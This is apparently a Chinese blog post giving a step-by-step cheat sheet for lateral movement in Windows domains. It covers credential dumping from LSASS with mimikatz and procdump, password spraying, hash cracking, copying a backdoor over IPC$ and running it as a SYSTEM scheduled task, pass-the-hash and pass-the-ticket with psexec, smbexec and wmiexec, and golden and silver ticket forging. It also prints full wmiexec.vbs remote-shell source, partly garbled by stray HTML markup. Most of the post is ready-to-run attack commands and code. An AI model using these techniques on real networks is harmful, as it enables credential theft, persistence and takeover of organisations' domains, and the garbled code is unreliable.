域横向移动

1.前置知识

以下域渗透方法在工作组渗透中也可以尝试,可尝试将 域名/用户名 这种换为 ./用户名 或 用户名 这种、专门的域名参数填workgroup

windows server 2012以上默认关闭wdigest、以下打KB2871997这种补丁(NTLM传递只能用管理员用户)时只能获取密码hash

开启wdigest:

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

2.信息收集

命令获取

net time /domain,查域全名(拒绝访问,则存在域但不是域用户登录)

net user,查询工作组用户

net user /domain,查询域用户

net group "Domain Admins" /domain,查域管理员

net group "Domain Controllers" /domain,查域控

whoami/user,查用户SID(域SID就是用户SID去掉最后一位)

for /L %1 in (1,1,254) DO @ping -w 1 -n 1 192.168.128.%1 | findstr "TTL=",存活IP探测

ping 域名.com,获取域控IP

mimikatz工具

https://github.com/ParrotSec/mimikatz

以管理员运行,收集凭证

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords full

CS

提权后,右键->执行->Run MIimikatz(收集凭证)

视图->凭证信息

右键->目标->端口扫描(扫描IP、端口)

视图->目标

procdump(Windows官方工具)配合mimikatz

https://learn.microsoft.com/en-us/sysinternals/downloads/procdump

以管理员运行,获取内存文件->mimikatz从中收集凭证

procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full

密码喷洒

atexec工具,https://github.com/maaaaz/impacket-examples-windows

结合bat脚本爆破,如果IP或计算机名正确则会命令执行

FOR /F %%i in (IP或计算机名字典.txt) do atexec.exe -hashes :密码NTLM 域名/用户名@%%i "ipconfig"
pause

FOR /F %%i in (IP或计算机名字典.txt) do atexec.exe 域名/用户名:密码明文@%%i "ipconfig"
pause

hash爆破

Windows vista、windows server 2003后哈希加密为NTLM

hashcat工具,https://hashcat.net/hashcat/

hashcat.exe -a 0 -m 1000 密码NTLM 字典路径 --force,0是字典爆破,1000是NTLM,强制爆破

hashcat.exe -a 0 -m 1000 密码NTLM 字典路径 --show,查看结果

3.ipc$计划任务

创建连接

net use \\IP或计算机名\ipc$ "密码明文" /user:域名\用户名

创建连接常见的错误代码

(1)5:拒绝访问,可能是使用的用户不是管理员权限,需要先提升权限
(2)51:网络问题,Windows 无法找到网络路径
(3)53:找不到网络路径,可能是 IP 地址错误、目标未开机、目标 Lanmanserver 服务未启动、有防火墙等问题
(4)67:找不到网络名,本地 Lanmanworkstation 服务未启动,目标删除 ipc$
(5)1219:提供的凭据和已存在的凭据集冲突,说明已建立 IPC$,需要先删除
(6)1326:账号密码错误
(7)1792:目标 NetLogon 服务未启动,连接域控常常会出现此情况
(8)2242:用户密码过期,目标有账号策略,强制定期更改密码
#建立 IPC 失败的原因
(1)目标系统不是 NT 或以上的操作系统
(2)对方没有打开 IPC$共享
(3)对方未开启 139、445 端口,或者被防火墙屏蔽
(4)输出命令、账号密码有错误

复制入后门->创建计划任务(需要管理员权限)->删除连接(可选)

copy c:\Users\x\Desktop\shell.exe \\IP或计算机名\c$
schtasks /create /s IP或计算机名 /ru system /sc minute /mo 1 /tn "mysqlstart" /tr c:\shell.exe
net use \\IP或计算机名 /del

4.hash和明文传递

atexec工具

https://github.com/maaaaz/impacket-examples-windows

atexec.exe -hashes :密码NTLM 域名/用户名@IP或计算机名 "命令"
atexec.exe 域名/用户名:密码明文@IP或计算机名 "命令"

PsExec(Windows官方程序)

https://learn.microsoft.com/en-us/sysinternals/downloads/psexec

直接以system使用对方cmd

PsExec.exe \\IP或计算机名 -u 域名/用户名 -p 密码明文 -s cmd

也可以先创建IPC连接,然后以system使用对方cmd

net use \\IP或计算机名\ipc$ "密码明文" /user:域名\用户名
PsExec.exe \\IP或计算机名 -s cmd

psexec工具(支持哈希传递)

https://github.com/maaaaz/impacket-examples-windows

以system使用对方cmd

psexec.exe -hashes :密码NTLM 域名/用户名@IP或计算机名
psexec.exe 域名/用户名:密码明文@IP或计算机名

CS

对目标右键->Jump->psexec

选择凭证、监听器用Beacon SMB(正向)

smbexec工具

https://github.com/maaaaz/impacket-examples-windows

以system使用对方cmd

smbexec.exe -hashes :密码NTLM 域名/用户名@IP或计算机名
smbexec.exe 域名/用户名:密码明文@IP或计算机名

wmic工具(Windows官方程序)

WMI服务的工具,端口135,支持明文传递且不会留痕,但是无回显

wmic /node:IP或计算机名 /user:域名\用户名 /password:密码明文 process call create "cmd.exe /c whoami >c:\1.txt"

利用vbs脚本返回一个cmd

cscript //nologo wmiexec.vbs /shell IP或计算机名 域名\用户名 密码明文

On Error Resume Next
'################################ Temp Result File , Change it to where you like
Const Path = "C:\"
Const FileName = "wmi.dll" 
Const timeOut = 1200
'################################
file = Path & "\" & FileName
file = Replace(file,"\\","\")
Set fso = CreateObject("Scripting.FileSystemObject")
FilePath = fso.GetParentFolderName(file) 'for wmi create share
'WScript.Echo FilePath

WAITTIME = timeOut              'ms  time to execute command ,read result file after 1200ms

Set objArgs = WScript.Arguments
intArgCount = objArgs.Count 
If intArgCount < 2 Or intArgCount > 5 Then
    WScript.Echo 
    WScript.Echo "   $$\      $$\ $$\      $$\ $$$$$$\ $$$$$$$$\ $$\   $$\ $$$$$$$$\  $$$$$$\  "
    WScript.Echo "   $$ | $\  $$ |$$$\    $$$ |\_$$  _|$$  _____|$$ |  $$ |$$  _____|$$  __$$\ "
    WScript.Echo "   $$ |$$$\ $$ |$$$$\  $$$$ |  $$ |  $$ |      \$$\ $$  |$$ |      $$ /  \__|"
    WScript.Echo "   $$ $$ $$\$$ |$$\$$\$$ $$ |  $$ |  $$$$$\     \$$$$  / $$$$$\    $$ |      "
    WScript.Echo "   $$$$  _$$$$ |$$ \$$$  $$ |  $$ |  $$  __|    $$  $$<  $$  __|   $$ |      "
    WScript.Echo "   $$$  / \$$$ |$$ |\$  /$$ |  $$ |  $$ |      $$  /\$$\ $$ |      $$ |  $$\ "
    WScript.Echo "   $$  /   \$$ |$$ | \_/ $$ |$$$$$$\ $$$$$$$$\ $$ /  $$ |$$$$$$$$\ \$$$$$$  |"
    WScript.Echo "   \__/     \__|\__|     \__|\______|\________|\__|  \__|\________| \______/ "
    WScript.Echo "                                               v1.1dev        By. Twi1ight   "
    WScript.Echo " Usage:" & _
                    vbTab & "wmiexec.vbs  /shell  host" & _
        vbNewLine & vbTab & "wmiexec.vbs  /shell  host  user  pass" & _
        vbNewLine & vbTab & "wmiexec.vbs  /cmd  host  command" & _
        vbNewLine & vbTab & "wmiexec.vbs  /cmd  host  user  pass  command" & vbNewLine & _
        vbNewLine & vbTab & "  /shell"  & vbTab & "half-interactive shell mode" & _
        vbNewLine & vbTab & "  /cmd" & vbTab & vbTab & "single command mode" & _
        vbNewLine & vbTab & "  host" & vbTab & vbTab & "hostname or IP address" & _
        vbNewLine & vbTab & "  command" & vbTab & "the command to execute on remote host" & _
        vbNewLine & vbNewLine & vbTab & "  -waitTIME" & vbTab & _
         "[both mode] ,delay TIME to read result,"& vbNewLine & vbTab & _
         vbTab & vbTab &"eg. 'systeminfo -wait5000' 'ping google.com -wait2000'" & _
        vbNewLine & vbTab & "  -persist" & vbTab & _
         "[both mode] ,running command background and persistent" & vbNewLine & vbTab & _
         vbTab & vbTab &"such as nc.exe or Trojan" 
    WScript.Quit()
End If

If LCase(objArgs.Item(0)) <> "/cmd" And LCase(objArgs.Item(0)) <> "/shell" Then

WScript.Echo "WMIEXEC ERROR: Wrong Mode Specified!"

WScript.Quit

End If

boolShellMode = True

If LCase(objArgs.Item(0)) = "/cmd" Then boolShellMode = False

If boolShellMode = False Then command = objArgs.Item(intArgCount - 1)


host = objArgs.Item(1)

If intArgCount > 3 Then

user = objArgs.Item(2)

pass = objArgs.Item(3)

Set objShell = CreateObject("WScript.Shell")

strNetUse = "cmd.exe /c net use \" & host & " """ & pass & """ " & "/user:" & user

'WScript.Echo strNetUse

objShell.Run strNetUse,0

End If

'Output Status

WScript.Echo "WMIEXEC : Target -> " & host

WScript.Echo "WMIEXEC : Connecting..."


Set objLocator = CreateObject("wbemscripting.swbemlocator")

If intArgCount >2 Then

set objWMIService = objLocator.connectserver(host,"root/cimv2",user,pass)

Else

Set objWMIService = objLocator.ConnectServer(host,"root/cimv2")

End If

If Err.Number <> 0 Then

WScript.Echo "WMIEXEC ERROR: " & Err.Description

WScript.Quit

End If

WScript.Echo "WMIEXEC : Login -> OK"

WScript.Echo "WMIEXEC : Result File -> " & file


boolPersist = False

'Create Share

CreateShare()

CurrentFolder = Null

'-----single Command mode------

If boolShellMode = False Then

WAITTIME = 5000

WScript.Echo vbNewLine & vbTab & host & "  >>  " & command

boolGetFolder = False

strResult = PhraseCmd( command )

'WScript.Echo strResult

If strResult = "persist" Then

boolPersist = True

Exec command,"nul"

Else

Exec command, file

ReadResult()

End If

If intArgCount > 3 Then

Set objShell = CreateObject("WScript.Shell")

strNetUse = "cmd.exe /c net use \" & host & " /del"

objShell.Run strNetUse,0

End If

DeleteShare()

WScript.Quit

End If

'------------------------------


'++++++++shell mode++++++++++++

'get current working directory

boolGetFolder = True

CurrentFolder = Exec("cd", file)


'WScript.Echo CurrentFolder

Do While True

boolPersist = False

WAITTIME = timeOut

wscript.stdout.write(CurrentFolder & ">")

command = wscript.stdin.ReadLine

'press 'Enter' directorly

Do While command = ""

wscript.stdout.write(CurrentFolder & ">")

command = wscript.stdin.ReadLine

Loop

If LCase(Trim(command)) = "exit" Then Exit Do

'If Not IsEmpty(command) Then 

'process 'cd' command-------->>>>

strResult = PhraseCmd( command )

If strResult = "cd" Then

command = command & " & cd "

boolGetFolder = True

DestFolder = Exec(command, file)

If CurrentFolder = DestFolder Then

WScript.Echo "The system cannot find the path specified."

Else

CurrentFolder = DestFolder

End If

ElseIf strResult = "persist" Then

boolPersist = True

'WScript.Echo "persist"

Exec command,"nul"

'##########################################toDo

'-----------<<<<

    Else

On Error Resume Next

err.clear

Exec command, file

ReadResult()

If err.number <> 0 Then wscript.echo( "WMIEXEC ERROR: " & Err.Number & " " & err.description)

Err.Clear

On Error Goto 0

End If

loop


strDelFile = "del " & file & " /F"

Exec strDelFile,"nul"

If intArgCount > 3 Then

Set objShell = CreateObject("WScript.Shell")

strNetUse = "cmd.exe /c net use \" & host & " /del"

objShell.Run strNetUse,0

End If

DeleteShare()


'#####################################

Function PhraseCmd(cmd)

PhraseCmd = False ' not 'cd'

    arrCommand = Split(cmd)

strExe = arrCommand(0)

If LCase(Trim(strExe)) = "cd" Or LCase(Trim(strExe)) = "cd.exe" Then PhraseCmd = "cd"  ' is 'cd'

    Set regEx = New RegExp

regEx.Pattern = "[1]😒"

regEx.IgnoreCase = True

Set Matches = regEx.Execute(cmd)

If Matches.Count <> 0 Then PhraseCmd = "cd" ' is 'd:'

    'phrase time command

regEx.Pattern = "(.?)-wait(\d+)"

regEx.IgnoreCase = True

Set Matches = regEx.Execute(cmd)

If Matches.Count <> 0 Then

Set objMatch = Matches(0)

command = objMatch.SubMatches(0)

'WScript.Echo "Command :" & command

WAITTIME = CInt(objMatch.SubMatches(1))

WScript.Echo "WMIEXEC : Waiting " & WAITTIME & " ms..." & vbNewLine

End If

'phrase persist command

regEx.Pattern = "(.?)-persist"

regEx.IgnoreCase = True

Set Matches = regEx.Execute(cmd)

If Matches.Count <> 0 Then

Set objMatch = Matches(0)

command = objMatch.SubMatches(0)

PhraseCmd = "persist"  ' is quiet

    End If

End Function


Function CreateShare()

'create share

Set objNewShare = objWMIService.Get("Win32_Share")

intReturn = objNewShare.Create _

(FilePath, "WMI_SHARE", 0, 25, "")

If intReturn <> 0 Then

WScript.Echo "WMIEXEC ERROR: Share could not be created." & _

vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn

Select Case intReturn

Case 2

WScript.Echo "WMIEXEC ERROR: Access Denied!"

Case 9

WScript.Echo "WMIEXEC ERROR: Invalid File Path!"

Case 22

WScript.Echo "WMIEXEC ERROR: Share Name Already In Used!"

Case 24

WScript.Echo "WMIEXEC ERROR: Directory NOT exists!"

End Select

If intReturn <> 22 Then WScript.Quit

Else

WScript.Echo "WMIEXEC : Share created sucess."

WScript.Echo "WMIEXEC : Share Name -> WMI_SHARE"

WScript.Echo "WMIEXEC : Share Path -> " & FilePath

End If

End Function


Function DeleteShare()

Set colShares = objWMIService.ExecQuery _

("Select * from Win32_Share Where Name = 'WMI_SHARE'")

For Each objShare In colShares

intReturn = objShare.Delete

Next

If intReturn <> 0 Then

WScript.Echo "WMIEXEC ERROR: Delete Share failed." & _

vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn

Select Case intReturn

Case 2

WScript.Echo "WMIEXEC ERROR: Access Denied!"

Case 25

WScript.Echo "WMIEXEC ERROR: Share Not Exists!"

End Select

Else

WScript.Echo "WMIEXEC : Share deleted sucess."

End If

End Function


Function Exec(cmd, file)

Set objStartup = objWMIService.Get("Win32_ProcessStartup")

Set objConfig = objStartup.SpawnInstance_

objConfig.ShowWindow = 12


Set objProcess</span>=objWMIService.get(<span style="color: #800000;">"</span><span style="color: #800000;">Win32_Process</span><span style="color: #800000;">"</span><span style="color: #000000;">)
strExec </span>= <span style="color: #800000;">"</span><span style="color: #800000;">cmd.exe /c </span><span style="color: #800000;">"</span> &amp; cmd &amp; <span style="color: #800000;">"</span><span style="color: #800000;"> &gt; </span><span style="color: #800000;">"</span> &amp; <span style="color: #0000ff;">file</span> &amp; <span style="color: #800000;">"</span><span style="color: #800000;"> 2&gt;&amp;1</span><span style="color: #800000;">"</span>  <span style="color: #800000;">'</span><span style="color: #800000;">2&gt;&amp;1 err</span>



    If boolPersist Then

strExec = cmd

intPath = InStr(cmd,"")

If intPath = 0 Then strExec = CurrentFolder & "" & strExec

    End If

'WScript.Echo strExec

intReturn = objProcess.Create _

(strExec, CurrentFolder, objConfig, intProcessID)  'Add CurrentFolder (strExec, Null, objConfig, intProcessID)

If intReturn <> 0 Then

WScript.Echo "WMIEXEC ERROR: Process could not be created." & _

vbNewLine & "WMIEXEC ERROR: Command -> " & cmd & _

vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn

Select Case intReturn

Case 2

WScript.Echo "WMIEXEC ERROR: Access Denied!"

Case 3

WScript.Echo "WMIEXEC ERROR: Insufficient Privilege!"

Case 9

WScript.Echo "WMIEXEC ERROR: Path Not Found!"

End Select

Else

'        WScript.Echo "Process created." & _

'            vbNewLine & "Command: " & cmd & _

'            vbNewLine & "Process ID: " & intProcessID

If boolPersist Then WScript.Echo "WMIEXEC : Process created. PID: "& intProcessID

If boolGetFolder = True Then

boolGetFolder = False

Exec = GetCurrentFolder()

Exit Function

End If

'ReadResult()

    End If

End Function


Function ReadResult()

WScript.Sleep(WAITTIME)

UNCFilePath = "\" & host & "" & "WMI_SHARE" & "<span style="color: #800000;">" & FileName

Set fso = CreateObject("Scripting.FileSystemObject")

Set objFile = fso.OpenTextFile(UNCFilePath, 1)

If Not objFile.AtEndOfStream Then strContents = objFile.ReadAll

objFile.Close

WScript.Echo strContents

'fso.DeleteFile(UNCFilePath)   win2008 fso has no privilege to delete file on share folder

strDelFile = "del " & file & " /F"

Exec strDelFile,"nul"

End Function


Function GetCurrentFolder()

WScript.Sleep(WAITTIME)

UNCFilePath = "\" & host & "" & "WMI_SHARE" & "<span style="color: #800000;">" & FileName

Set fso = CreateObject("Scripting.FileSystemObject")

Set objFile = fso.OpenTextFile(UNCFilePath, 1)

GetCurrentFolder = objFile.ReadLine

objFile.Close

strDelFile = "del " & file & " /F"

Exec strDelFile,"nul"

End Function

wmiexec.vbs源码(点击展开)

wmiexec工具(支持哈希传递)

https://github.com/maaaaz/impacket-examples-windows

wmiexec.exe -hashes :密码NTLM 域名/用户名@IP或计算机名 "命令"
wmiexec.exe 域名/用户名:密码明文@IP或计算机名 "命令"

5.PTH

以管理员运行mimikatz打开用户权限cmd(工作组域名填workgroup)

mimikatz.exe
privilege::debug
sekurlsa::pth /user:用户名 /domain:域名.com /ntlm:密码NTLM

dir \\IP或计算机名\c$

6.PTK

打了补丁NTLM只能用管理员用户时可以尝试AES256传递

以管理员运行mimikatz收集AES256并打开用户权限cmd

mimikatz.exe
privilege::debug
sekurlsa::ekeys
sekurlsa::pth /user:用户名 /domain:域名.com /aes256:密码AES256

dir \\IP或计算机名\c$

7.PTT

基于kerberos协议传递TGT票据

MS14-068.exe配合mimikatz

https://github.com/ianxtianxt/MS14-068

生成票据文件->mimikatz导入票据(无需管理员权限)->查看票据->清空票据(可选)

MS14-068.exe -u 用户名@域名.com -s 用户SID -d IP或计算机名 -p 密码明文
mimikatz.exe
kerberos::ptc 票据文件名
exit
klist
dir \\IP或计算机名\c$
klist purge

kekeo配合mimikatz

https://github.com/gentilkiwi/kekeo

生成票据文件->mimikatz导入票据(无需管理员权限)

kekeo.exe "tgt::ask /user:用户名 /domain:域名.com /ntlm:密码NTLM"
mimikatz.exe
kerberos::ptc 票据文件名

利用本地票据

管理员连接过会有10h票据缓存

以管理员运行mimikatz收集本地票据->导入票据(无需管理员权限)

mimikatz.exe
privilege::debug
sekurlsa::tickets /export
kerberos::ptt 票据文件名

黄金票据

利用krbtgt用户,伪造TGT

以管理员运行mimikatz获取krbtgt的密码NTLM->生成票据文件->导入票据(无需管理员权限)

mimikatz.exe
privilege::debug
lsadump::dcsync /domain:域名.com /user:krbtgt
kerberos::golden /admin:管理员用户名 /domain:域名.com /sid:域SID /krbtgt:krbtgt密码NTLM
kerberos::ptt 票据文件名

白银票据

只能访问指定服务,伪造TGS

先用mimikatz收集凭证,拿到服务NTLM

kerberos::golden /user:任意用户名 /domain:域名.com /sid:域SID /target:域全名(dc.lk.com) /rc4:服务NTLM /service:cifs /ptt
kerberos::ptt 票据文件名

  1. a-z ↩︎

posted @ 2022-12-06 16:33  Hacker&Cat  阅读(77)  评论(0编辑  收藏  举报